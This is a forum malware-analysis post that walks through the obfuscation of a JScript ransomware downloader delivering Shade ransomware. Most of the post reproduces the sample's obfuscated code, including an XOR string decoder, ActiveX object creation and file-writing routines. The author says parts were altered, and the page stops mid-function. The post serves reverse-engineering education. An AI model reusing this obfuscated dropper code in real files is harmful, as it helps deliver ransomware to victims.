Malware Analysis ¦¬¦-¦+¦-¦¬¦¦¦¦¦-¦-¦-TБTВTМ_23xls.js - big puzzle family - updated with Jan 14, 2017 version

DardiM

Thread author
EDITED Jan 14, 2017
last post :
¦¬¦-¦+¦-¦¬¦¦¦¦¦-¦-¦-TБTВTМ_23xls.js

----------------------------------------------------------------------------------

From https://malwaretips.com/threads/23-11-2016-20.65760/
Thanks to @XIII

Документы и декларация на товар 11222016.js
(Payload : Shade ransomware : extension .NO_MORE_RANSOM)

From https://malwaretips.com/threads/28-11-2016-20.65943/
Thanks to Der.Reisende

начисления_xls.js

Why these samples ?

Because they are very big puzzles.

=> Only read on if you like long puzzle games ;)

I will not explain the JS functions in detail, considering the reader already has at least basic knowledge of JScript / JavaScript.

Just read the spoiler :

Just remember :

object.method(parameter)
object :
an object (ActiveX or another)
.method
a dot followed by the method to be called (the name of a function belonging to the object : a method)
(parameter)
one, two, etc. parameter(s) that will be used (or not) by the method (= function), separated by "," (without quotes)
The same call can also be written :
object["method"](parameter)
and then, with obfuscated data :
zeze[ezez()](fdsfsf)

Example :

var a = zeze[ezez()](fdsfsf)

and looking at the code

zeze = "abcd";
ezez() is a function that returns "charAt"
fdsfsf = 0;
=> var a = "abcd"["charAt"](0)

which can be written :

"abcd".charAt(0)
=> calls the charAt method (= function) of the String object ("abcd" is a string :p)
=> retrieves the character at the position given by the parameter : 0

=> var a = "a"; (because positions begin at 0, not 1)

I have put some parts in spoilers, to avoid "eye destruction".

I will take Документы и декларация на товар 11222016.js as the example.
Both samples use similar obfuscation (but not all the parts are the same).

1) What it looks like :

A very long list of functions, some of which call other function(s)

Examples :

- Some basic functions, where only the return value matters

Some basic functions return a single char; the other parts are useless
Code:
function tw() {
    var Kq = 46619;
    return "x";
}

function A() {
    var lG = 10035;
    return "S";
}
function FV()
{
    var QWn=59633;
    return eval("String.fromCharCode(409-298)");
    // => String.fromCharCode(111)
    // => "o"
}
Some functions call other functions; the other parts are useless
Code:
function Wed() {
    var Amg = 47318;
    var b = ")V5r_nuqh";
    return A();
}

function xcT() {
    var u = 2654;
    return ih() + l();
}

function aU()
{
    var VF=1094;
    var SE="sG;=)%Q)LE";
    return WgE();
}
- Some functions are more elaborate :

all parts matter, and together they obfuscate the real value
Code:
function J(DK)
{
    var Kk=842271;
    var IJ=Kk+44517;
    var q=IJ/918;
    var a=q-965;
    // => here : var a = 1
    var Qk = eval(Mr() + (DK+a) + aKq());

    return Qk;
}

function HyA(WtD)
{
    var XkX = lw();
    var cW = Do();
    var md = St();
    XkX = XkX + dka() + cW + ymC() + md;
    var ddh = WtD[XkX];
    return ddh;
}

- Some functions are main functions that do all the work.

=> We will see them in detail, later

As usual, I have changed some parts in the SPOILER to avoid copy-paste => save => run => infection :p

Code:
function tw() {
    var Kq = 46619;
    return "x";
}

function A() {
    var lG = 10035;
    return "S";
}

function Wed() {
    var Amg = 47318;
    var b = ")V5r_nuqh";
    return A();
}

function Zgm() {
    var Bpq = 43044;
    return "J";
}

function pT() {
    var Ow = 26898;
    return "t";
}

function ye() {
    var MD = 5179;
    var ZG = "LZA5Ui#>Y";
    return pT();
}

function sm() {
    var iDQ = 47758;
    return Wed() + ye();
}

function d() {
    var PzD = 10270;
    return "_";
}

function j() {
    var Cra = 3733;
    return "r";
}

function QTN() {
    var fZ = 63455;
    var oI = "K0*)2zOb";
    return j();
}

function ih() {
    var T = 3878;
    return eval("String.fromCharCode(6+99)");
}

function l() {
    var XLg = 58279;
    return eval("String.fromCharCode(3+107)");
}

function xcT() {
    var u = 2654;
    return ih() + l();
}

function kd() {
    var aZB = 24017;
    return QTN() + xcT();
}

function s() {
    var F = 25788;
    return sm() + kd();
}

function pe() {
    var Fok = 16103;
    return eval("String.fromCharCode(5871/57+0)");
}

function Glt() {
    var o = 57632;
    return eval("String.fromCharCode(19+27)");
}

function sd() {
    var bO = 19250;
    return pe() + Glt();
}

function haG() {
    var bc = 31246;
    return eval("String.fromCharCode(249-147)");
}

function gcy() {
    var eS = 48179;
    return "g";
}

function eYh() {
    var Ef = 101;
    return "r";
}

function OfW() {
    var KUy = 6617;
    var g = "-D3HC=";
    return eYh();
}

function eH() {
    var Ki = 31783;
    return "o";
}

function yn() {
    var gdW = 1672;
    return "&";
}

function Pv() {
    var UN = 32594;
    var TWI = "=lLxig";
    return eH();
}

function Whd() {
    var iGy = 55910;
    return OfW() + Pv();
}

function yVO() {
    var blE = 58449;
    return haG() + Whd();
}

function ryJ() {
    var WO = 44821;
    return sd() + yVO();
}

function iW() {
    var ljJ = 51757;
    return s() + ryJ();
}

function TR() {
    var QU = 24221;
    return "m";
}

function Pif() {
    var ofO = 37564;
    return "i";
}

function rPV() {
    var RqL = 5563;
    var X = "K)C6f1qC";
    return TR();
}

function us() {
    var erg = 39100;
    return eval("String.fromCharCode(67)");
}

function M() {
    var JY = 17872;
    return rPV() + us();
}

function jR() {
    var IA = 56634;
    return eval("String.fromCharCode(94+10)");
}

function WgE() {
    var ej = 26631;
    return "a";
}

function ROc() {
    var L = 30021;
    return "J";
}

function aU() {
    var VF = 1094;
    var SE = "sG;=)%Q)LE";
    return WgE();
}

function dad() {
    var um = 3812;
    return eval("String.fromCharCode(865-751)");
}

function E() {
    var bA = 11630;
    return aU() + dad();
}

function Z() {
    var zXZ = 13325;
    return jR() + E();
}

function NT() {
    var tY = 14724;
    return M() + Z();
}

function UjL() {
    var m = 61281;
    return "E";
}

function H() {
    var vC = 35509;
    return "C";
}

function GhP() {
    var dT = 6557;
    var CgG = ")Uwd:%S";
    return H();
}

function FV() {
    var QWn = 59633;
    return eval("String.fromCharCode(409-298)");
}

function jq() {
    var IsO = 11335;
    return GhP() + FV();
}

function OTU() {
    var f = 52470;
    return eval("String.fromCharCode(24+76)");
}

function kx() {
    var yk = 65417;
    return eval("String.fromCharCode(60+41)");
}

function ed() {
    var dk = 2951;
    return "3";
}

function wDH() {
    var zu = 4217;
    return "(";
}

function N() {
    var awp = 17163;
    var GHg = "T!_4dI@TWWK";
    return wDH();
}

function vff() {
    var V = 4234;
    return kx() + N();
}

function e() {
    var Lu = 60064;
    return OTU() + vff();
}

function id() {
    var B = 9324;
    return jq() + e();
}

function adq() {
    var Dk = 32154;
    return NT() + id();
}

function Mr() {
    var k = 4925;
    return iW() + adq();
}

function aKq() {
    var CrA = 55261;
    return eval("String.fromCharCode(262-221)");
}

function J(DK) {
    var Kk = 842271;
    var IJ = Kk + 44517;
    var q = IJ / 918;
    var a = q - 965;
    var Qk = eval(Mr() + (DK + a) + aKq());

    return Qk;
}

function Jr() {
    var nf = 64046;
    return "Y";
}

function Oju() {
    var nW = 10830;
    return "l";
}

function GoL() {
    var yK = 30267;
    var Tf = "Gnu3oc";
    return Oju();
}

function ZYk() {
    var fc = 1013;
    return "P";
}

function Ca() {
    var Gbc = 23646;
    return "e";
}

function WAF() {
    var XJQ = 8710;
    var vl = "otuZtnWF&Qi";
    return Ca();
}

function lw() {
    var p = 57451;
    return GoL() + WAF();
}

function EGQ() {
    return J(957 - 848);
}

function wYY() {
    return J(6 * 17);
}

function Do() {
    var DI = 13740;
    return EGQ() + wYY();
}

function CX() {
    var pBj = 43338;
    return "r";
}

function wx() {
    var LyB = 25334;
    return "t";
}

function SAy() {
    var EQl = 7716;
    var VO = "E02PGP";
    return wx();
}

function qBu() {
    var db = 26120;
    return "h";
}

function Hft() {
    var tah = 4205;
    return "!";
}

function t() {
    var JQv = 51698;
    var vy = "!bTQKmCT<a";
    return qBu();
}

function St() {
    var PXb = 36011;
    return SAy() + t();
}

function dka() {
    var hZd = "";
    hZd = hZd;
    return hZd;
}

function ymC() {
    var lDE = "";
    lDE = lDE;
    return lDE;
}

function HyA(WtD) {
    var XkX = lw();
    var cW = Do();
    var md = St();
    XkX = XkX + dka() + cW + ymC() + md;
    var ddh = WtD[XkX];
    return ddh;
}

function QtJ() {
    var DZQ = 3368;
    return "y";
}

function Hjz() {
    var ERX = 63067;
    return "A";
}

function bYp() {
    var dkY = 21709;
    var XQb = "wpGvNSb;bVL";
    return Hjz();
}

function xEQ() {
    var fq = 50513;
    return "D";
}

function Cg() {
    var DEN = 57041;
    return "B";
}

function lP() {
    var mYV = 28465;
    var tYs = "Q1^4h;Tz";
    return xEQ();
}

function SuU() {
    return J(4 + 74);
}

function MN() {
    var Bz = 18406;
    return lP() + SuU();
}

function I() {
    var dJH = 18172;
    return bYp() + MN();
}

function xzm() {
    return J(67);
}

function qw() {
    var Ap = 9051;
    return "B";
}

function XSr() {
    var Ky = 22421;
    return "v";
}

function Q() {
    var pB = 34207;
    var fDk = "#)b>dixAY";
    return qw();
}

function jrF() {
    return J(2385 / 53 - 0);
}

function Be() {
    var CM = 56871;
    return Q() + jrF();
}

function TwY() {
    var W = 61512;
    return xzm() + Be();
}

function XOA() {
    var NRA = 53614;
    return I() + TwY();
}

function rbT() {
    return J(70 + 12);
}

function POQ() {
    return J(6785 / 59 - 0);
}

function dt() {
    var yi = 60732;
    return "E";
}

function Rw() {
    var LPO = 23444;
    return "r";
}

function nL() {
    var PTl = 57087;
    var TgY = "g3v73oI<";
    return Rw();
}

function mVZ() {
    var iv = 2780;
    return POQ() + nL();
}

function wG() {
    var lJx = 30138;
    return rbT() + mVZ();
}

function NG() {
    var wOg = 43521;
    return "f";
}

function mXR() {
    var tD = 51744;
    return "e";
}

function Fxm() {
    var v = 37889;
    var rrJ = "pfl!,4YlCv^a";
    return mXR();
}

function ocz() {
    var RNH = 39641;
    return "$";
}

function xT() {
    var ZL = 18048;
    return "a";
}

function RA() {
    var cfV = 30870;
    var yYJ = "h050<SO$-y";
    return xT();
}

function Ws() {
    return J(36 * 3);
}

function NL() {
    var Jv = 29491;
    return RA() + Ws();
}

function gR() {
    var Mu = 32934;
    return Fxm() + NL();
}

function yUo() {
    var OO = 51481;
    return wG() + gR();
}

function oh() {
    var h = 21632;
    return XOA() + yUo();
}

function vq() {
    return J(35 + 31);
}

function Hk() {
    return J(302 - 195);
}

function YA() {
    var Tt = 28880;
    return vq() + Hk();
}

function cp() {
    var xG = 8827;
    return "*";
}

function VNo() {
    var CLX = 45617;
    return "o";
}

function BP() {
    var PH = 10084;
    var px = "b6.j2WspcPY(";
    return VNo();
}

function sI() {
    return J(6 * 19);
}

function uKr() {
    return J(348 - 248);
}

function VUd() {
    var qGQ = 31313;
    return sI() + uKr();
}

function Imt() {
    var Iyc = 63845;
    return BP() + VUd();
}

function CWZ() {
    var szi = 27704;
    return YA() + Imt();
}

function bxE() {
    return J(920 - 841);
}

function ajz() {
    var lE = 49080;
    return "l";
}

function JP() {
    var lu = 43416;
    return "o";
}

function gt() {
    var OXk = 236;
    var hMS = "j<L>!fm%e";
    return JP();
}

function rJi() {
    var dv = 3412;
    return bxE() + gt();
}

function YAs() {
    return J(6 * 19);
}

function ELA() {
    return J(8 + 96);
}

function Hbn() {
    var r = 36669;
    return YAs() + ELA();
}

function sC() {
    var On = 39813;
    return rJi() + Hbn();
}

function BZ() {
    var qK = 51395;
    return "t";
}

function w() {
    var YAd = 17952;
    return "s";
}

function zs() {
    var VDU = 22173;
    var hoA = "n6(!zrO29";
    return BZ();
}

function kL() {
    return J(835 - 731);
}

function bh() {
    var toA = 43781;
    return zs() + kL();
}

function uf() {
    return J(2860 / 26 + 0);
}

function GP() {
    var gF = 39081;
    return "3";
}

function toJ() {
    var NO = 39621;
    return "n";
}

function hh() {
    var lfB = 7505;
    var FVS = "!n!!&.&qYCUh";
    return toJ();
}

function Jm() {
    var cT = 50098;
    return uf() + hh();
}

function C() {
    var wcG = 33691;
    return bh() + Jm();
}

function tDk() {
    var AKC = 30304;
    return sC() + C();
}

function qdI(jp) {
    var Uh = eval("ActiveXObject");
    var Rl = new Uh(oh());
    var WuR = "";
    WuR = WuR + J(551 - 435) + J(109) + J(161 - 55) + J(418 - 309) + J(10 * 11) + J(1043 - 925) + J(229 - 120);
    var XkB = WuR;
    var oQ = (typeof Rl[CWZ()] == XkB);
    if (!oQ) return oQ;
    oQ = (typeof Rl[tDk()] == XkB);

    return oQ;
}

function Hd(tG, yRI) {
    var XEE = 72822;
    var uxo = XEE + 58878;
    var kc = uxo / 300;
    var JiT = kc - 438;
    var HkD = JiT;
    var gcq = 102714;
    var TQ = gcq + 26334;
    var oq = TQ / 228;
    var rP = oq - 566;
    var Sb = rP;
    var YCE = 120043;
    var PbA = YCE + 27693;
    var SKR = PbA / 313;
    var oX = SKR - 465;
    var iuV = oX;
    var EXT = "";
    EXT = EXT + J(74 + 37) + J(32 * 3) + J(7232 / 64 + 0) + J(6 * 19) + J(94 + 6) + J(557 - 485) + J(109) + J(20 + 95);
    var BAK = EXT;
    var sbG = "";
    sbG = sbG + J(5488 / 56 + 0) + J(612 - 509) + J(32 * 3) + J(423 - 310) + J(35 + 29) + J(99 + 16);
    var UAR = sbG;

    if (Math.cos(HkD) > Sb)
        iuV = eval(BAK);
    else
        iuV = eval(UAR);

    if (Math.sin(HkD) > Sb) {
        var TA = iuV(tG, yRI);
        return TA;
    } else
        return HkD;
}

function PgR() {
    var yQ = 516582;
    var bb = yQ + 8898;
    var jUh = bb / 755;
    var XUW = jUh - 696;
    return 0 + XUW;
}

function pXY() {
    var Bi = "";
    Bi = Bi;
    return Bi;
}

function TG() {
    var jE = 752491;
    var qDB = jE + 54701;
    var JLj = qDB / 808;
    var ZvU = JLj - 999;
    return ZvU + 0;
}

function Bv() {
    var Wx = 32391;
    var ept = Wx + 1427;
    var jU = ept / 914;
    var wBY = jU - 35;
    return 0 + wBY;
}

function aW() {
    var GR = "";
    GR = GR + J(30 + 68) + J(103) + J(2976 / 31 + 0) + J(276 - 163) + J(154 - 90) + J(5 * 23);
    return GR;
}

function Hb() {
    var CzR = 208985;
    var gp = CzR + 57754;
    var xoD = gp / 411;
    var ZD = xoD - 648;
    return 0 + ZD;
}

function Ua() {
    var dSE = "";
    dSE = dSE + J(14 * 7) + J(103) + J(44 + 52) + J(60 + 53) + J(256 - 192) + J(94 + 21);
    return dSE;
}

function GuV() {
    var QHj = 469118;
    var mE = QHj + 16324;
    var riR = mE / 543;
    var HPx = riR - 893;
    return 0 + HPx;
}

function vOX() {
    var qIJ = 87393;
    var ll = qIJ + 7077;
    var hKF = ll / 201;
    var hMF = hKF - 454;
    return hMF + 0;
}

function nsV() {
    var tTu = "";
    tTu = tTu + J(82 + 16) + J(103) + J(4992 / 52 - 0) + J(15 + 98) + J(6 * 11) + J(3630 / 33 + 0) + J(8019 / 81 + 0) + J(20 * 5) + J(62 + 2) + J(60 + 55);
    return tTu;
}

function uQR() {
    var AET = "";
    AET = AET + J(218 - 117) + J(22 + 91) + J(96 + 14) + J(666 - 558) + J(36 + 30) + J(3502 / 34 + 0) + J(32 * 3) + J(10283 / 91 + 0) + J(6 * 11) + J(7810 / 71 - 0) + J(3663 / 37 + 0) + J(81 + 19);
    return AET;
}

function te() {
    var oOV = "";
    oOV = oOV;
    return oOV;
}

function QRO(eQZ, AV) {
    var QJ = HyA(eQZ);
    var DIL = PgR();
    var Hm = HyA(AV);
    var Tv = [pXY()][TG()];
    while (DIL < QJ) {
        var un = DIL / Bv();
        var nH = eQZ[aW()](DIL);
        DIL = DIL + Hb();
        nH = nH + eQZ[Ua()](DIL);
        DIL = DIL + GuV();
        var gD = Hd(nH, vOX());
        var Km = AV[nsV()](un % Hm);
        var WY = gD ^ Km;
        var Qk = String[uQR()](WY);
        Tv = Tv + te() + Qk;
    }
    return Tv;
}

function VNB(AK) {
    var kO = 118956;
    var ApS = kO + 55044;
    var ELV = ApS / 580;
    var htB = ELV - 172;
    var LPh = htB;
    var UuE = "";
    UuE = UuE + J(109) + J(1650 / 15 - 0) + J(5 * 23);
    var xw = UuE;
    try {
        var ux = "";
        ux = ux + J(7 * 13);
        var KUe = "";
        KUe = KUe + J(10 * 7) + J(419 - 319) + J(5 * 23) + J(684 - 601) + J(20 * 5) + J(657 - 549) + J(321 - 210) + J(784 - 707) + J(32 * 3) + J(6480 / 60 - 0) + J(1500 / 15 + 0);
        xw = ux + AK[KUe]();
        var xZz = "";
        xZz = xZz + J(452 - 354) + J(284 - 181) + J(32 * 3) + J(97 + 16) + J(1408 / 22 - 0) + J(5 * 23);
        var Pz = 660305;
        var Rlj = Pz + 62830;
        var pgJ = Rlj / 679;
        var eSw = pgJ - 809;
        xw = xw + LPh[xZz](eSw);
        var Yv = "";
        Yv = Yv + J(136 / 2 - 0) + J(716 - 618) + J(63 + 40) + J(577 - 467);
        var VUK = [];
        VUK[0] = "d3";
        VUK[1] = "dah";
        VUK[2] = "s";
        VUK[3] = "h";
        VUK[4] = "663";
        VUK[5] = "asg";
        VUK[6] = "g";
        VUK[7] = "dh";
        var Sq = VUK[7] + VUK[5] + VUK[3] + VUK[0] + VUK[4] + VUK[6] + VUK[1] + VUK[2];
        WScript[Yv](Sq);
    } catch (Ms) {
        var rd = "";
        rd = rd + J(742 - 676) + J(271 - 158) + J(16 + 84) + J(82 + 14) + J(75 + 40) + J(3800 / 38 - 0) + J(67 + 11) + J(8 + 89) + J(15 * 7) + J(539 - 439) + J(392 / 4 + 0) + J(4600 / 40 + 0);
        var rOs = "";
        rOs = rOs + J(40 + 46) + J(4 + 78) + J(9310 / 95 - 0) + J(495 - 382) + J(70 + 34) + J(3 * 37) + J(34 + 81) + J(9 * 5) + J(64 + 13) + J(48 + 52) + J(5 * 23) + J(59 * 2) + J(143 - 33) + J(2034 / 18 - 0) + J(954 / 9 - 0);
        var OxT = WScript[rd](rOs);
        var CFm = "";
        CFm = CFm + J(12 * 7) + J(3192 / 28 + 0) + J(33 + 67) + J(683 - 570) + J(65 + 2) + J(27 + 83) + J(9396 / 87 + 0) + J(3648 / 38 - 0) + J(446 - 342) + J(109);
        var Wl = typeof OxT[CFm];
        var uL = "";
        uL = uL + J(860 - 746) + J(2530 / 22 + 0) + J(113) + J(8 * 13) + J(109) + J(9384 / 92 - 0);
        var KDf = uL;
        if (Wl == KDf) {
            var rC = 55817;
            var EZO = rC + 11587;
            var BN = EZO / 82;
            var SC = BN - 819;
            var JeR = SC;
            var kP = "";
            kP = kP + J(747 - 677) + J(8700 / 87 - 0) + J(5 * 23) + J(41 * 2) + J(837 - 726) + J(20 * 5) + J(14 * 7) + J(5720 / 55 + 0) + J(32 * 3) + J(107) + J(759 / 11 - 0) + J(102 + 8) + J(94 + 13) + J(2 + 97) + J(20 * 5) + J(113);
            var acD = 607;
            var lru = acD + 3401;
            var NK = lru / 4;
            var IW = NK - 1000;
            xw = AK[kP](IW) + xw;
        } else {
            var gA = 472398;
            var nh = gA + 23328;
            var dU = nh / 518;
            var rkq = dU - 947;
            var JeR = rkq;
            var CU = [];
            CU[0] = "S";
            CU[1] = "pec";
            CU[2] = "Get";
            CU[3] = "e";
            CU[4] = "r";
            CU[5] = "F";
            CU[6] = "old";
            CU[7] = "ial";
            var di = CU[2] + CU[0] + CU[1] + CU[7] + CU[5] + CU[6] + CU[3] + CU[4];
            var bDo = 254595;
            var hxj = bDo + 51425;
            var IkN = hxj / 535;
            var fg = IkN - 571;
            xw = AK[di](fg) + xw;
        }
    }
    return xw;
}


function JK(rch, LAe, tC, xnW) {
    var xUj = 85687;
    var oEC = xUj + 61733;
    var se = oEC / 364;
    var hP = se - 405;
    var saL = hP;
    if (rch > saL) {
        rch = saL;
    }
    var XJ = QRO("32290802101215242C1D01", "ANlhxsfCDykvurcqjY4RRqr9m5mh5FlojeGYDzFGG37989hSeNYp8K699X6IbQAe945t6BVJfyf74i");
    var GNY = "";
    GNY = GNY + J(810 - 712) + J(25 + 28) + J(9 * 13) + J(7 * 17) + J(3230 / 38 - 0) + J(1073 - 991) + J(16 * 5) + J(8228 / 68 + 0) + J(595 - 493) + J(253 - 149) + J(706 - 655) + J(76 + 33) + J(6180 / 60 - 0) + J(16 * 3) + J(10 * 5) + J(7 + 45) + J(747 - 648) + J(489 - 407) + J(4200 / 42 + 0) + J(7584 / 96 - 0) + J(162 - 113) + J(1 + 64) + J(1060 - 958) + J(40 + 41) + J(239 - 136) + J(45 + 21) + J(1079 - 975) + J(16 * 7) + J(7280 / 70 - 0) + J(7 + 62) + J(63 + 17) + J(101) + J(3744 / 78 - 0) + J(279 - 201) + J(1072 - 972) + J(543 - 461) + J(5253 / 51 - 0) + J(409 - 306) + J(87 - 10) + J(1054 - 939) + J(71) + J(32 + 32) + J(5310 / 45 - 0) + J(20 + 55) + J(823 - 713) + J(866 - 762) + J(637 - 524) + J(5700 / 75 - 0) + J(234 - 164) + J(26 + 27) + J(73) + J(5412 / 66 - 0) + J(29 + 57) + J(634 - 533) + J(3 * 37) + J(47) + J(4250 / 50 + 0) + J(481 - 375) + J(10 * 5) + J(10 * 7) + J(65 + 46) + J(6902 / 58 + 0) + J(7 * 17) + J(632 - 566) + J(3685 / 55 - 0) + J(21 + 35) + J(231 - 164) + J(82 + 27) + J(5106 / 69 + 0) + J(741 - 633) + J(52 + 2);
    XJ = new LAe(QRO("3445150A3F2325543401510204", GNY));
    XJ[xnW](tC, rch);
    var ez = 2842;
    var DDn = ez + 749;
    var gm = DDn / 21;
    var ihg = gm - 163;
    var xw = ihg;
    return xw;
}

function ygJ(ng, LAe, tC, xnW) {
    var JC = "";
    JC = JC + J(4066 / 38 + 0) + J(93 + 7) + J(3488 / 32 + 0) + J(4386 / 43 - 0) + J(5 * 23) + J(94 + 9);
    var iSL = ng[JC];
    var Jnf = 279668;
    var EQQ = Jnf + 15258;
    var HB = EQQ / 478;
    var ubH = HB - 610;
    var dUR = ubH;
    var sDM = 402607;
    var Ko = sDM + 39011;
    var RI = Ko / 827;
    var tU = RI - 529;
    var Nk = tU;
    var CWg = xnW;
    if (iSL == dUR) {
        var iUx = "";
        iUx = iUx + J(416 - 303) + J(774 - 658) + J(6213 / 57 + 0);
        CWg = iUx;
    }
    if (iSL == Nk) {
        var FL = iSL * Nk;
        return JK(FL, LAe, tC, xnW);
    }
    var NW = "";
    NW = NW + J(605 - 491) + J(942 - 826) + J(97) + J(456 / 4 - 0) + J(9775 / 85 - 0) + J(113) + J(7592 / 73 - 0) + J(804 - 695) + J(20 + 82);
    var BY = 250521;
    var FPm = BY + 40485;
    var kA = FPm / 317;
    var pHz = kA - 918;
    var zD = 1065;
    var em = zD + 11871;
    var fx = em / 616;
    var Tk = fx - 20;
    var jXy = ng[NW](pHz, iSL - Tk);
    return ygJ(jXy, LAe, tC, CWg);
}

function WN(gV, Jp, LAe) {
    var TOw = 376387;
    var LH = TOw + 46238;
    var XCe = LH / 735;
    var sM = XCe - 565;
    var DC = sM;

    var Qbv = "";
    Qbv = Qbv + J(605 - 524) + J(89 + 11) + J(960 / 10 + 0) + J(4356 / 44 + 0);
    var Ld = gV[Qbv]();
    var tv = "";
    tv = tv + J(232 - 150) + J(9152 / 88 - 0) + J(728 - 607) + J(898 - 798);
    var Hx = gV[tv];
    var bP = 444811;
    var NUC = bP + 14609;
    var nPH = NUC / 620;
    var NoG = nPH - 540;
    var etf = NoG;
    var rx = "";
    rx = rx + J(832 / 13 - 0) + J(547 - 480) + J(6 * 13) + J(6633 / 99 - 0) + J(5 * 13) + J(6 + 39) + J(1701 / 21 + 0) + J(2000 / 20 + 0) + J(8624 / 88 + 0) + J(10 * 11) + J(88 + 25) + J(9 + 90) + J(44 + 70) + J(7500 / 75 - 0) + J(10120 / 88 - 0);
    var SFa = new LAe(rx);
    var SfA = "";
    SfA = SfA + J(27 + 70) + J(8 * 13) + J(76 + 33);
    var OB = SfA;
    var PbB = "";
    PbB = PbB + J(101) + J(428 - 324) + J(4500 / 45 + 0) + J(107) + J(0 + 99) + J(6 * 19);
    var Yb = "";
    Yb = Yb + J(32 * 3) + J(11100 / 100 + 0) + J(32 + 79) + J(27 + 73) + J(65 + 44) + J(355 - 256);
    SFa[PbB][Yb](OB, etf, Hx);
    var CFg = "";
    CFg = CFg + J(59 + 51) + J(3 * 37) + J(20 * 5) + J(109);
    SFa[CFg]();
    var ZJ = "";
    ZJ = ZJ + J(350 - 254) + J(738 - 639) + J(9 * 11) + J(7 * 11) + J(589 - 489) + J(15 + 103);
    SFa[ZJ]();
    var XmR = "";
    XmR = XmR + J(72 + 24) + J(340 - 229) + J(6882 / 62 - 0) + J(128 - 28) + J(71 + 38) + J(541 - 442) + J(60 + 6) + J(25 + 78) + J(4 * 29) + J(109) + J(53 * 2);
    SFa(OB)[XmR](Ld);
    var BC = "";
    BC = BC + J(72 + 44) + J(757 - 646) + J(8712 / 88 - 0) + J(429 - 333) + J(786 - 671) + J(7400 / 74 - 0);
    SFa[BC]();
    var LvZ = "";
    LvZ = LvZ + J(9 * 13) + J(32 * 3) + J(397 - 290) + J(950 - 834) + J(20 * 5);
    Ld = SFa(OB)[LvZ];
    var wJ = "";
    wJ = wJ + J(214 / 2 - 0) + J(20 * 5) + J(995 - 886) + J(33 + 69) + J(5 * 23) + J(2 + 101);
    var Coz = Ld[wJ];

    if (Coz > DC) {
        var los = "";
        los = los + J(75 + 7) + J(576 / 6 + 0) + J(9 * 13) + J(50 + 50) + J(83) + J(68 + 42) + J(222 - 153) + J(611 - 507) + J(107) + J(302 - 202);
        //gV[los](Jp);
        return true;
    } else return false;
}

function DN(ayd) {
    var wC = new ayd(QRO("144B501D5E32151C2758215D16", "C83o7Ba2t0D1zn3tfqUcMUag2g8hwJlsWgdXjD9rtYWDbxF2uQrnf64sJOKWzGaqgAj8716EyG"));
    return wC;
}

function YjS(GgD) {
    var wC = new GgD(QRO("35232A193A6A6C0107742C333529", "xprTvXBYJ8dgay32zvNLN6fbbvJp1XV6w4U5BuhZ4MyPZyDCytLJ8Ls0WrItDcADtEzeOiEKgUjKGhcs"));
    return wC;
}

function BSu(WZr, Svj) {
    var Xh = [];
    Xh[0] = "M";
    Xh[1] = "9";
    Xh[2] = "fxj";
    Xh[3] = "E";
    Xh[4] = "4";
    Xh[5] = "OZ";
    Xh[6] = "3";
    Xh[7] = "ZE";
    Xh[8] = "9i";
    Xh[9] = "hj";
    Xh[10] = "e0S";
    Xh[11] = "g";
    Xh[12] = "ml";
    Xh[13] = "Ad9";
    Xh[14] = "5X";
    Xh[15] = "J";
    Xh[16] = "U";
    Xh[17] = "rb";
    Xh[18] = "7oZ";
    Xh[19] = "3e";
    Xh[20] = "yr7";
    Xh[21] = "ug";
    Xh[22] = "Ux";
    Xh[23] = "s";
    Xh[24] = "3f2";
    Xh[25] = "s4";
    Xh[26] = "u";
    Xh[27] = "Jj";
    Xh[28] = "noU";
    Xh[29] = "KLh";
    Xh[30] = "lbO";
    Xh[31] = "E";
    Xh[32] = "w";
    Xh[33] = "t";
    Xh[34] = "rJ";
    Xh[35] = "3L";
    Xh[36] = "V";
    Xh[37] = "3g";
    Xh[38] = "5T";
    Xh[39] = "Kn";
    Xh[40] = "m";
    Xh[41] = "1Wl";
    var ms = Xh[22] + Xh[0] + Xh[4] + Xh[19] + Xh[28] + Xh[8] + Xh[10] + Xh[37] + Xh[3] + Xh[38] + Xh[36] + Xh[5] + Xh[27] + Xh[17] + Xh[1] + Xh[35] + Xh[31] + Xh[11] + Xh[20] + Xh[16] + Xh[21] + Xh[26] + Xh[30] + Xh[7] + Xh[2] + Xh[32] + Xh[29] + Xh[12] + Xh[14] + Xh[18] + Xh[34] + Xh[25] + Xh[15] + Xh[40] + Xh[41] + Xh[6] + Xh[9] + Xh[24] + Xh[39] + Xh[13] + Xh[23] + Xh[33];
    var LN = eval(QRO("022B2E465A151A", ms));
    var kQ = LN[QRO("303A085F124D03232E200451065D", "cYz6b9EVBLJ0k8wposUSED3bw02Cp6bI71mjcMnF7UfKxD6eFo6FO0VMpgcaENpyl8U5EdriaX0jZ")];
    var EB = "";
    EB = EB + J(557 - 440) + J(8036 / 98 - 0) + J(6630 / 65 + 0) + J(28 + 70) + J(1 + 55) + J(9752 / 92 - 0) + J(2795 / 43 + 0) + J(49 + 72) + J(38 + 42) + J(26 + 93) + J(757 - 660) + J(10 * 7) + J(73) + J(2 + 52) + J(5184 / 64 - 0) + J(944 - 892) + J(2544 / 48 - 0) + J(79) + J(6783 / 57 + 0) + J(4620 / 70 + 0) + J(10 + 55) + J(7 * 11) + J(324 - 250) + J(1173 / 23 - 0) + J(7 * 17) + J(4 + 100) + J(579 - 478) + J(48 + 16) + J(35 + 65) + J(6351 / 73 - 0) + J(3552 / 37 - 0) + J(420 - 341) + J(852 - 750) + J(35 + 39) + J(6 * 17) + J(15 * 7) + J(213 - 113) + J(7 * 17) + J(3 + 61) + J(109) + J(1024 - 936) + J(37 + 30) + J(8 * 7) + J(10 * 7) + J(6 * 11) + J(83) + J(4 * 19) + J(9 * 11) + J(455 / 7 + 0) + J(21 + 80) + J(65 + 44) + J(90 + 15) + J(78 + 7) + J(4 * 17) + J(109) + J(16 * 3) + J(2 * 37) + J(8 + 70) + J(192 / 2 + 0) + J(76 + 24) + J(1488 / 31 - 0) + J(47) + J(929 - 881) + J(8200 / 100 + 0) + J(21 + 32) + J(6 * 11) + J(8 * 13) + J(73) + J(31 + 74) + J(9630 / 90 + 0) + J(490 - 383);
    //WZr[QRO("12360B064D0E04133D1D",EB)](kQ);
    return true;
}

function jGP(OF, qnI) {
    var mD = [];
    mD[0] = "5o";
    mD[1] = "aL";
    mD[2] = "R";
    mD[3] = "R";
    mD[4] = "b0K";
    mD[5] = "gh";
    mD[6] = "mC";
    mD[7] = "qdn";
    mD[8] = "L9p";
    mD[9] = "A";
    mD[10] = "WKH";
    mD[11] = "Au";
    mD[12] = "yn";
    mD[13] = "7";
    mD[14] = "b";
    mD[15] = "70";
    mD[16] = "eW";
    mD[17] = "e75";
    mD[18] = "mY";
    mD[19] = "qK";
    mD[20] = "ZZH";
    mD[21] = "h3";
